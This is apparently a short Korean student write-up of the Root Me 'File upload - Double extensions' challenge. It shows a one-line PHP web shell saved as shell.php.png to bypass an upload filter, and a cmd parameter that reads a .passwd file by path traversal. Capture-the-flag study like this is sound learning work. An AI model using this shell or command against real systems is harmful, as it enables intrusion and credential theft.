[3주차] Root Me File upload - Double extensions

https://www.root-me.org/en/Challenges/Web-Server/File-upload-Double-extensions

 

Challenges/Web - Server : File upload - Double extensions [Root Me : Hacking and Information Security learning platform]

위 링크에 들어가서 챌린지를 시작하면 이렇게 뜬다.  다 눌러보니까 다 다른 이모지들이 있다.

: 당신의 목표는 PHP 코드를 업로드하여 이 사진 갤러리를 해킹하는 것입니다. 응용 프로그램의 루트에 있는 .passwd 파일에서 유효성 검사 암호를 검색합니다.

검색을 통해 메모장에 이 코드를 적고 shell.php.png로 저장을 하고 업로드를 해보았다.

<?php

system($_GET[cmd]);

?>

업로드를 하니 저렇게 링크가 떠서 눌러보았다.

뭘해야하는 건지 모르겠어서 검색을 통해 조언을 얻고 계속해서 풀어보았다.

?cmd=cat%20../../../.passwd0

위 내용을 링크 뒤에 넣으면 바로 답이 나온다(조언을 통해 알게되었다. 감사합니다.)

위 사진에 마지막에 있는 문구를 넣어서 문제를 풀었다.